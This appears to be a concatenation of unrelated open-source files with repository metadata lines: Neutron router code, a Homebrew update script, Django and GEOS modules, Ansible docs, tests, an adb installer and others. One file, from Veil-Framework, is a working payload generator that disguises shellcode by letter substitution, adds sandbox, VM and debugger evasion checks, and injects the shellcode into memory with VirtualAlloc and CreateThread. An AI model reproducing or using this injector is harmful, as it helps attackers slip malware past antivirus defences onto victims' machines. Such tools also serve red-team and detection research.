def _create_dvr_gateway(self, ex_gw_port, gw_interface_name):
"""Create SNAT namespace."""
snat_ns = self.create_snat_namespace()
# connect snat_ports to br_int from SNAT namespace
for port in self.get_snat_interfaces():
# create interface_name
interface_name = self.get_snat_int_device_name(port['id'])
self._internal_network_added(
snat_ns.name, port['network_id'],
port['id'], port['fixed_ips'],
port['mac_address'], interface_name,
dvr_snat_ns.SNAT_INT_DEV_PREFIX)
self._external_gateway_added(ex_gw_port, gw_interface_name,
snat_ns.name, preserve_ips=[])
self.snat_iptables_manager = iptables_manager.IptablesManager(
namespace=snat_ns.name,
use_ipv6=self.use_ipv6)
# kicks the FW Agent to add rules for the snat namespace
self.agent.process_router_add(self)
def create_snat_namespace(self):
# TODO(mlavalle): in the near future, this method should contain the
# code in the L3 agent that creates a gateway for a dvr. The first step
# is to move the creation of the snat namespace here
self.snat_namespace = dvr_snat_ns.SnatNamespace(self.router['id'],
self.agent_conf,
self.driver,
self.use_ipv6)
self.snat_namespace.create()
return self.snat_namespace
def get_snat_int_device_name(self, port_id):
long_name = dvr_snat_ns.SNAT_INT_DEV_PREFIX + port_id
return long_name[:self.driver.DEV_NAME_LEN]
def _is_this_snat_host(self):
host = self.router.get('gw_port_host')
if not host:
LOG.debug("gw_port_host missing from router: %s",
self.router['id'])
return host == self.host
def _handle_router_snat_rules(self, ex_gw_port, interface_name):
if not self._is_this_snat_host():
return
if not self.get_ex_gw_port():
return
if not self.snat_iptables_manager:
LOG.debug("DVR router: no snat rules to be handled")
return
with self.snat_iptables_manager.defer_apply():
self._empty_snat_chains(self.snat_iptables_manager)
# NOTE DVR doesn't add the jump to float snat like the super class.
self._add_snat_rules(ex_gw_port, self.snat_iptables_manager,
interface_name)
| apache-2.0 |
clonetwin26/buck | scripts/updatehomebrew.py | 10 | 5458 | import argparse
import hashlib
import os
import re
import requests # Install with easy_install or pip install
import shutil
import subprocess
import sys
import tempfile
from contextlib import contextmanager
from updatecommon import get_release
from updatecommon import upload_release
TARGET_MACOS_VER = 'yosemite'
TARGET_MACOS_VER_SPEC = TARGET_MACOS_VER + '_or_later'
@contextmanager
def os_closing(o):
yield o
os.close(o)
def parse_args(args):
parser = argparse.ArgumentParser(description='Update homebrew-fb')
parser.add_argument(
'version_tag',
help='The name of the tag to create a release for')
parser.add_argument(
'github_token',
type=argparse.FileType(),
help='The authentication token to use to talk to GitHub')
parser.add_argument(
'--tap-repo-location',
default='/usr/local/Homebrew/Library/Taps/facebook/homebrew-fb',
help='The location of the homebrew-fb tap')
return parser.parse_args(args)
def build_bottle(version_tag, tap_repo_location):
print('Building bottle...')
subprocess.check_call(
[
'brew',
'unlink',
'buck',
],
cwd=tap_repo_location)
subprocess.check_call(
[
'brew',
'install',
'--build-bottle',
'buck',
],
cwd=tap_repo_location)
subprocess.check_call(
[
'brew',
'bottle',
'--no-rebuild',
'--skip-relocation',
'buck',
],
cwd=tap_repo_location)
bottle_filename = 'buck-{ver}.{macos_ver}.bottle.tar.gz'.format(
ver=version_tag[1:],
macos_ver=TARGET_MACOS_VER)
subprocess.check_call(
'mv buck-{ver}.*.bottle.tar.gz {bottle_filename}'.format(
ver=version_tag[1:],
bottle_filename=bottle_filename),
shell=True, # for wildcard expansion
cwd=tap_repo_location)
return os.path.join(tap_repo_location, bottle_filename)
def fetch_tarball(url):
print('Fetching tarball from `{}`...'.format(url))
r = requests.get(url, stream=True)
handle, path = tempfile.mkstemp(suffix='.tar.gz')
with os_closing(handle) as handle:
for chunk in r.iter_content(chunk_size=4096):
if chunk:
os.write(handle, chunk)
return path
def validate():
print('Validating bottle...')
subprocess.check_call([
'brew',
'uninstall',
'--force',
'buck',
])
subprocess.check_call([
'brew',
'install',
'buck',
])
def update_bottle(version_tag, github_token, tap_repo_location):
release_data = get_release(version_tag)
tarball_sha256 = sha256(fetch_tarball(release_data['tarball_url']))
# First, update the bottle to have the new version and tarball sha.
temp_handle, temp_path = tempfile.mkstemp(text=True)
with os_closing(temp_handle):
with open(os.path.join(tap_repo_location, 'buck.rb'), 'r') as orig:
for line in orig:
line = re.sub(
r'@@buck_version = .*$',
'@@buck_version = "{}"'.format(version_tag[1:]),
line)
line = re.sub(
r'sha256 "[a-z0-9]{64}"$',
'sha256 "{}"'.format(tarball_sha256),
line)
line = re.sub(
r' url "https://.+"$',
' url "{}"'.format(release_data['tarball_url']),
line)
os.write(temp_handle, line)
shutil.copyfile(temp_path, os.path.join(tap_repo_location, 'buck.rb'))
# Now, build the bottle's binary, and update the file with the new sha.
bottle_file = build_bottle(version_tag, tap_repo_location)
bottle_sha256 = sha256(bottle_file)
upload_release(
bottle_file,
release_data['upload_url'],
github_token,
{'Content-Type': 'application/x-tar'})
os.remove(bottle_file)
temp_handle, temp_path = tempfile.mkstemp(text=True)
with os_closing(temp_handle):
with open(os.path.join(tap_repo_location, 'buck.rb'), 'r') as orig:
for line in orig:
line = re.sub(
r'sha256 "[a-z0-9]{64}" => :.+$',
'sha256 "{sha}" => :{macos_version_spec}'.format(
sha=bottle_sha256,
macos_version_spec=TARGET_MACOS_VER_SPEC),
line)
os.write(temp_handle, line)
shutil.copyfile(temp_path, os.path.join(tap_repo_location, 'buck.rb'))
validate()
subprocess.check_call(
[
'git',
'commit',
'-m',
'Update `buck.rb` to {}'.format(version_tag),
'buck.rb',
],
cwd=tap_repo_location)
print('Your commit is ready for testing! Check it out:')
print(tap_repo_location)
def sha256(file_name):
with open(file_name) as fd:
return hashlib.sha256(fd.read()).hexdigest()
if __name__ == '__main__':
args = parse_args(sys.argv[1:])
github_token_lines = args.github_token.readlines()
assert len(github_token_lines) == 1, (
'Invalid number of lines in github_token file')
update_bottle(
args.version_tag,
github_token_lines[0].strip(),
args.tap_repo_location)
| apache-2.0 |
Veil-Framework/Veil | tools/evasion/payloads/python/shellcode_inject/letter_substitution.py | 1 | 9106 | """
Currently, this code takes normal shellcode, and replaces the a hex character
with a random non hex letter. At runtime,
the executables reverses the letter substitution and executes the shellcode
Letter substitution code was adapted from:
http://www.tutorialspoint.com/python/string_maketrans.htm
Module built by @christruncer
Contributed to by @EdvardHolst
"""
import random
import string
from datetime import date
from datetime import timedelta
from tools.evasion.evasion_common import encryption
from tools.evasion.evasion_common import evasion_helpers
from tools.evasion.evasion_common import gamemaker
from tools.evasion.evasion_common import shellcode_help
class PayloadModule:
def __init__(self, cli_obj):
# required options
self.description = "A letter used in shellcode is replaced with a different letter. At runtime, the exe reverses the letter substitution and executes the shellcode"
self.language = "python"
self.rating = "Excellent"
self.extension = "py"
self.hex_letters = "abcdefx"
self.non_hex_letters = "ghijklmnopqrstuvwyz"
self.name = "Python Letter Substitution"
self.path = "python/shellcode_inject/letter_substitution"
self.shellcode = shellcode_help.Shellcode(cli_obj)
self.cli_opts = cli_obj
self.payload_source_code = ""
if cli_obj.ordnance_payload is not None:
self.payload_type = cli_obj.ordnance_payload
elif cli_obj.msfvenom is not None:
self.payload_type = cli_obj.msfvenom
elif not cli_obj.tool:
self.payload_type = ""
self.cli_shellcode = False
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, or Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days"],
"HOSTNAME" : ["X", "Optional: Required system hostname"],
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"CLICKTRACK" : ["X", "Optional: Minimum number of clicks to execute payload"],
"UTCCHECK" : ["FALSE", "Optional: Validates system does not use UTC timezone"],
"VIRTUALFILES" : ["FALSE", "Optional: Check if VM supporting files exist"],
"VIRTUALDLLS" : ["FALSE", "Check for dlls loaded in memory"],
"CURSORMOVEMENT" : ["FALSE", "Check if cursor is in same position after 30 seconds"],
"USERPROMPT" : ["FALSE", "Make user click prompt prior to execution"],
"MINRAM" : ["FALSE", "Check for at least 3 gigs of RAM"],
"SANDBOXPROCESS" : ["FALSE", "Check for common sandbox processes"],
"DETECTDEBUG" : ["FALSE", "Check if debugger is present"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}
def generate(self):
# Random letter substition variables
encode_with_this = random.choice(self.hex_letters)
decode_with_this = random.choice(self.non_hex_letters)
# Generate Random Variable Names
subbed_shellcode_variable_name = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_decoded_letter = evasion_helpers.randomString()
rand_correct_letter = evasion_helpers.randomString()
rand_sub_scheme = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('unicode_escape')
Shellcode = Shellcode.decode('ascii')
Shellcode = Shellcode.replace(encode_with_this, decode_with_this).replace('\\', '\\\\')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Add in the letter switching code
payload_code += '\t' * num_tabs_required + 'import codecs\n'
payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this
payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this
payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace('\\\\', '\\') +'\'\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n'
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ subbed_shellcode_variable_name +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| gpl-3.0 |
dbarsam/python-vsgen | tests/__main__.py | 1 | 2305 | # -*- coding: utf-8 -*-
"""
This module executes vsgen unittests (i.e. all tests in the current folder). It exists as an alernative to the command line interface::
> python -m unittest discover --start-directory . --pattern test*.py
For more testing options see the unittest documentation available at https://docs.python.org/3.5/library/unittest.html.
This module exposes an __main__ entry point useful for test development (usually from an Python IDE) and not recommeded for normal test execution.
"""
import os
import sys
def main(argv=[]):
"""
Test main script
"""
import argparse
import unittest
parser = argparse.ArgumentParser(description='Executes the vsgen unit tests.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-n', '--testname', help='Specifies the test name to execute. This must be the fully qualified \'dotted\' path of the form \'package.module.class.function\' (e.g. \'tests.unit.test_feature.TestClass.test_function\'). If not provided all tests resolved from the internal test discovery process are executed.', action='append')
parser.add_argument('-f', '--testpattern', help='Specifies the test file pattern to execute during test discovery. If not provided all tests resolved from the internal test discovery process are executed.', default='test*.py')
parser.add_argument('-p', '--testpath', help='Specifies the test path for test discovery. If not provided, the internal test discovery uses the current directory.', default=os.path.dirname(os.path.realpath(__file__)))
args = parser.parse_args(argv[1:])
loader = unittest.TestLoader()
if args.testname:
testsuite = loader.loadTestsFromNames(args.testname)
else:
testsuite = loader.discover(args.testpath, args.testpattern)
runner = unittest.TextTestRunner(verbosity=2)
result = runner.run(testsuite)
return 0 if not result.failures and not result.errors else 1
if __name__ == '__main__':
# To use this package as an application we need to correct the sys.path
module_path = os.path.dirname(os.path.realpath(__file__))
package_path = os.path.normpath(os.path.join(module_path, '..'))
if package_path not in sys.path:
sys.path.append(package_path)
sys.exit(main(sys.argv))
| mit |
theicfire/djangofun | django/core/management/commands/shell.py | 230 | 3263 | import os
from django.core.management.base import NoArgsCommand
from optparse import make_option
class Command(NoArgsCommand):
option_list = NoArgsCommand.option_list + (
make_option('--plain', action='store_true', dest='plain',
help='Tells Django to use plain Python, not IPython.'),
)
help = "Runs a Python interactive interpreter. Tries to use IPython, if it's available."
shells = ['ipython', 'bpython']
requires_model_validation = False
def ipython(self):
try:
from IPython.frontend.terminal.embed import TerminalInteractiveShell
shell = TerminalInteractiveShell()
shell.mainloop()
except ImportError:
# IPython < 0.11
# Explicitly pass an empty list as arguments, because otherwise
# IPython would use sys.argv from this script.
try:
from IPython.Shell import IPShell
shell = IPShell(argv=[])
shell.mainloop()
except ImportError:
# IPython not found at all, raise ImportError
raise
def bpython(self):
import bpython
bpython.embed()
def run_shell(self):
for shell in self.shells:
try:
return getattr(self, shell)()
except ImportError:
pass
raise ImportError
def handle_noargs(self, **options):
# XXX: (Temporary) workaround for ticket #1796: force early loading of all
# models from installed apps.
from django.db.models.loading import get_models
loaded_models = get_models()
use_plain = options.get('plain', False)
try:
if use_plain:
# Don't bother loading IPython, because the user wants plain Python.
raise ImportError
self.run_shell()
except ImportError:
import code
# Set up a dictionary to serve as the environment for the shell, so
# that tab completion works on objects that are imported at runtime.
# See ticket 5082.
imported_objects = {}
try: # Try activating rlcompleter, because it's handy.
import readline
except ImportError:
pass
else:
# We don't have to wrap the following import in a 'try', because
# we already know 'readline' was imported successfully.
import rlcompleter
readline.set_completer(rlcompleter.Completer(imported_objects).complete)
readline.parse_and_bind("tab:complete")
# We want to honor both $PYTHONSTARTUP and .pythonrc.py, so follow system
# conventions and get $PYTHONSTARTUP first then import user.
if not use_plain:
pythonrc = os.environ.get("PYTHONSTARTUP")
if pythonrc and os.path.isfile(pythonrc):
try:
execfile(pythonrc)
except NameError:
pass
# This will import .pythonrc.py as a side-effect
import user
code.interact(local=imported_objects)
| bsd-3-clause |
pombredanne/https-gitlab.lrde.epita.fr-vcsn-vcsn | tests/python/complete.py | 1 | 1949 | #! /usr/bin/env python
import vcsn
from test import *
# check complete algorithm
# ------------------------
def check(i, o):
if isinstance(i, str):
i = vcsn.automaton(i)
CHECK(not i.is_complete())
o = vcsn.automaton(o)
CHECK(o.is_complete())
CHECK_EQ(o, i.complete())
# Idempotence.
CHECK_EQ(o, o.complete())
check('''
digraph
{
vcsn_context = "lal_char(abcd), b"
I -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
1 -> 2 [label = "c"]
2 -> F
}
''', '''
digraph
{
vcsn_context = "lal_char(abcd), b"
rankdir = LR
{
node [shape = point, width = 0]
I0
F2
}
{
node [shape = circle]
0
1
2
3 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
0 -> 3 [label = "c, d", color = DimGray]
1 -> 2 [label = "c"]
1 -> 3 [label = "a, b, d", color = DimGray]
2 -> F2
2 -> 3 [label = "a, b, c, d", color = DimGray]
3 -> 3 [label = "a, b, c, d", color = DimGray]
}
''')
# An automaton with an open context.
check(vcsn.b.expression('a').standard(), '''
digraph
{
vcsn_context = "letterset<char_letters(a)>, b"
rankdir = LR
edge [arrowhead = vee, arrowsize = .6]
{
node [shape = point, width = 0]
I0
F1
}
{
node [shape = circle, style = rounded, width = 0.5]
0
1
2 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
1 -> F1
1 -> 2 [label = "a", color = DimGray]
2 -> 2 [label = "a", color = DimGray]
}
''')
# An automaton without initial state.
check('''
digraph
{
vcsn_context = "lal_char(a), b"
0 -> 0 [label = "a"]
0 -> F0
}
''', '''
digraph
{
vcsn_context = "lal_char(a), b"
rankdir = LR
{
node [shape = point, width = 0]
I1
F0
}
{
node [shape = circle]
0 [color = DimGray]
1 [color = DimGray]
}
I1 -> 1 [color = DimGray]
0 -> F0 [color = DimGray]
0 -> 0 [label = "a", color = DimGray]
1 -> 1 [label = "a", color = DimGray]
}
''')
| gpl-3.0 |
cyberark-bizdev/ansible | lib/ansible/modules/windows/win_command.py | 23 | 4430 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Ansible, inc
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_command
short_description: Executes a command on a remote Windows node
version_added: 2.2
description:
- The C(win_command) module takes the command name followed by a list of space-delimited arguments.
- The given command will be executed on all selected nodes. It will not be
processed through the shell, so variables like C($env:HOME) and operations
like C("<"), C(">"), C("|"), and C(";") will not work (use the M(win_shell)
module if you need these features).
- For non-Windows targets, use the M(command) module instead.
options:
free_form:
description:
- the C(win_command) module takes a free form command to run. There is no parameter actually named 'free form'.
See the examples!
required: true
creates:
description:
- a path or path filter pattern; when the referenced path exists on the target host, the task will be skipped.
removes:
description:
- a path or path filter pattern; when the referenced path B(does not) exist on the target host, the task will be skipped.
chdir:
description:
- set the specified path as the current working directory before executing a command.
stdin:
description:
- Set the stdin of the command directly to the specified value.
version_added: '2.5'
notes:
- If you want to run a command through a shell (say you are using C(<),
C(>), C(|), etc), you actually want the M(win_shell) module instead. The
C(win_command) module is much more secure as it's not affected by the user's
environment.
- C(creates), C(removes), and C(chdir) can be specified after the command. For instance, if you only want to run a command if a certain file does not
exist, use this.
- For non-Windows targets, use the M(command) module instead.
author:
- Matt Davis
'''
EXAMPLES = r'''
- name: Save the result of 'whoami' in 'whoami_out'
win_command: whoami
register: whoami_out
- name: Run command that only runs if folder exists and runs from a specific folder
win_command: wbadmin -backupTarget:C:\backup\
args:
chdir: C:\somedir\
creates: C:\backup\
- name: Run an executable and send data to the stdin for the executable
win_command: powershell.exe -
args:
stdin: Write-Host test
'''
RETURN = r'''
msg:
description: changed
returned: always
type: boolean
sample: True
start:
description: The command execution start time
returned: always
type: string
sample: '2016-02-25 09:18:26.429568'
end:
description: The command execution end time
returned: always
type: string
sample: '2016-02-25 09:18:26.755339'
delta:
description: The command execution delta time
returned: always
type: string
sample: '0:00:00.325771'
stdout:
description: The command standard output
returned: always
type: string
sample: 'Clustering node rabbit@slave1 with rabbit@master ...'
stderr:
description: The command standard error
returned: always
type: string
sample: 'ls: cannot access foo: No such file or directory'
cmd:
description: The command executed by the task
returned: always
type: string
sample: 'rabbitmqctl join_cluster rabbit@master'
rc:
description: The command return code (0 means success)
returned: always
type: int
sample: 0
stdout_lines:
description: The command standard output split in lines
returned: always
type: list
sample: [u'Clustering node rabbit@slave1 with rabbit@master ...']
'''
| gpl-3.0 |
BT-ojossen/stock-logistics-workflow | __unported__/stock_location_flow_creator/product_pulled_flow_template.py | 33 | 1731 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Vaucher (Camptocamp)
# Copyright 2012 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Template of product pulled flow object """
from openerp.osv.orm import Model
from openerp.addons.stock_orderpoint_creator.base_product_config_template import BaseProductConfigTemplate
class ProductPulledFlow(BaseProductConfigTemplate, Model):
_name = 'product.pulled.flow.template'
_inherit = 'product.pulled.flow'
_table = 'product_pulled_flow_template'
_clean_mode = 'unlink'
def _get_ids_2_clean(self, cursor, uid, template_br, product_ids, context=None):
""" hook to select model specific objects to clean
return must return a list of id"""
model_obj = self._get_model()
ids_to_del = model_obj.search(cursor, uid,
[('product_id', 'in', product_ids)])
return ids_to_del
| agpl-3.0 |
burzillibus/RobHome | venv/lib/python2.7/site-packages/django/contrib/gis/geos/collections.py | 51 | 5160 | """
This module houses the Geometry Collection objects:
GeometryCollection, MultiPoint, MultiLineString, and MultiPolygon
"""
import json
import warnings
from ctypes import byref, c_int, c_uint
from django.contrib.gis.geos import prototypes as capi
from django.contrib.gis.geos.error import GEOSException
from django.contrib.gis.geos.geometry import GEOSGeometry, LinearGeometryMixin
from django.contrib.gis.geos.libgeos import geos_version_info, get_pointer_arr
from django.contrib.gis.geos.linestring import LinearRing, LineString
from django.contrib.gis.geos.point import Point
from django.contrib.gis.geos.polygon import Polygon
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.six.moves import range
class GeometryCollection(GEOSGeometry):
_typeid = 7
def __init__(self, *args, **kwargs):
"Initializes a Geometry Collection from a sequence of Geometry objects."
# Checking the arguments
if len(args) == 1:
# If only one geometry provided or a list of geometries is provided
# in the first argument.
if isinstance(args[0], (tuple, list)):
init_geoms = args[0]
else:
init_geoms = args
else:
init_geoms = args
# Ensuring that only the permitted geometries are allowed in this collection
# this is moved to list mixin super class
self._check_allowed(init_geoms)
# Creating the geometry pointer array.
collection = self._create_collection(len(init_geoms), iter(init_geoms))
super(GeometryCollection, self).__init__(collection, **kwargs)
def __iter__(self):
"Iterates over each Geometry in the Collection."
for i in range(len(self)):
yield self[i]
def __len__(self):
"Returns the number of geometries in this Collection."
return self.num_geom
# ### Methods for compatibility with ListMixin ###
def _create_collection(self, length, items):
# Creating the geometry pointer array.
geoms = get_pointer_arr(length)
for i, g in enumerate(items):
# this is a little sloppy, but makes life easier
# allow GEOSGeometry types (python wrappers) or pointer types
geoms[i] = capi.geom_clone(getattr(g, 'ptr', g))
return capi.create_collection(c_int(self._typeid), byref(geoms), c_uint(length))
def _get_single_internal(self, index):
return capi.get_geomn(self.ptr, index)
def _get_single_external(self, index):
"Returns the Geometry from this Collection at the given index (0-based)."
# Checking the index and returning the corresponding GEOS geometry.
return GEOSGeometry(capi.geom_clone(self._get_single_internal(index)), srid=self.srid)
def _set_list(self, length, items):
"Create a new collection, and destroy the contents of the previous pointer."
prev_ptr = self.ptr
srid = self.srid
self.ptr = self._create_collection(length, items)
if srid:
self.srid = srid
capi.destroy_geom(prev_ptr)
_set_single = GEOSGeometry._set_single_rebuild
_assign_extended_slice = GEOSGeometry._assign_extended_slice_rebuild
@property
def json(self):
if self.__class__.__name__ == 'GeometryCollection':
return json.dumps({
'type': self.__class__.__name__,
'geometries': [
{'type': geom.__class__.__name__, 'coordinates': geom.coords}
for geom in self
],
})
return super(GeometryCollection, self).json
geojson = json
@property
def kml(self):
"Returns the KML for this Geometry Collection."
return '<MultiGeometry>%s</MultiGeometry>' % ''.join(g.kml for g in self)
@property
def tuple(self):
"Returns a tuple of all the coordinates in this Geometry Collection"
return tuple(g.tuple for g in self)
coords = tuple
# MultiPoint, MultiLineString, and MultiPolygon class definitions.
class MultiPoint(GeometryCollection):
_allowed = Point
_typeid = 4
class MultiLineString(LinearGeometryMixin, GeometryCollection):
_allowed = (LineString, LinearRing)
_typeid = 5
@property
def closed(self):
if geos_version_info()['version'] < '3.5':
raise GEOSException("MultiLineString.closed requires GEOS >= 3.5.0.")
return super(MultiLineString, self).closed
class MultiPolygon(GeometryCollection):
_allowed = Polygon
_typeid = 6
@property
def cascaded_union(self):
"Returns a cascaded union of this MultiPolygon."
warnings.warn(
"`cascaded_union` is deprecated, use the `unary_union` property instead.",
RemovedInDjango20Warning, 2
)
return GEOSGeometry(capi.geos_cascaded_union(self.ptr), self.srid)
# Setting the allowed types here since GeometryCollection is defined before
# its subclasses.
GeometryCollection._allowed = (Point, LineString, LinearRing, Polygon, MultiPoint, MultiLineString, MultiPolygon)
| mit |
Shao-Feng/crosswalk-test-suite | webapi/tct-ui-css3-tests/inst.apk.py | 1996 | 3186 | #!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PARAMETERS = None
ADB_CMD = "adb"
def doCMD(cmd):
# Do not need handle timeout in this short script, let tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code is not None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".apk"):
cmd = "%s -s %s uninstall org.xwalk.%s" % (
ADB_CMD, PARAMETERS.device, os.path.basename(os.path.splitext(file)[0]))
(return_code, output) = doCMD(cmd)
for line in output:
if "Failure" in line:
action_status = False
break
return action_status
def instPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".apk"):
cmd = "%s -s %s install %s" % (ADB_CMD,
PARAMETERS.device, os.path.join(root, file))
(return_code, output) = doCMD(cmd)
for line in output:
if "Failure" in line:
action_status = False
break
return action_status
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception as e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.device:
(return_code, output) = doCMD("adb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
if not PARAMETERS.device:
print "No device found"
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| bsd-3-clause |
fireeye/flare-wmi | python-cim/samples/show_CCM_RecentlyUsedApps.py | 1 | 2035 | import logging
from cim import CIM
from cim.objects import Namespace
def main(type_, path):
if type_ not in ("xp", "win7"):
